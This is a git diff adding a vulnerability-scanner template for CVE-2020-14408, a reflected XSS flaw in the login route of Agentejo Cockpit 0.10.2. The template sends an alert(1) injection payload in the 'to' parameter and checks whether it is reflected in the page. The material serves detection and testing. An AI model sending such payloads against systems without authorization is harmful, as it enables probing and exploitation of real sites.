diff --git a/cves/2020/CVE-2020-14408.yaml b/cves/2020/CVE-2020-14408.yaml new file mode 100644 index 0000000000..e06e7fcc92 --- /dev/null +++ b/cves/2020/CVE-2020-14408.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-14408 + +info: + name: Agentejo Cockpit 0.10.2 - Reflected XSS + author: edoardottt + severity: medium + description: An issue was discovered in Agentejo Cockpit 0.10.2. Insufficient sanitization of the to parameter in the /auth/login route allows for injection of arbitrary JavaScript code into a web page's content, creating a Reflected XSS attack vector. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-14408 + cwe-id: CWE-79 + reference: + - https://github.com/agentejo/cockpit/issues/1310 + - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14408 + tags: cve,cve2022,cockpit,Agentejo,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/auth/login?to=/92874';alert(1)//280" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - ";alert(1)//280" \ No newline at end of file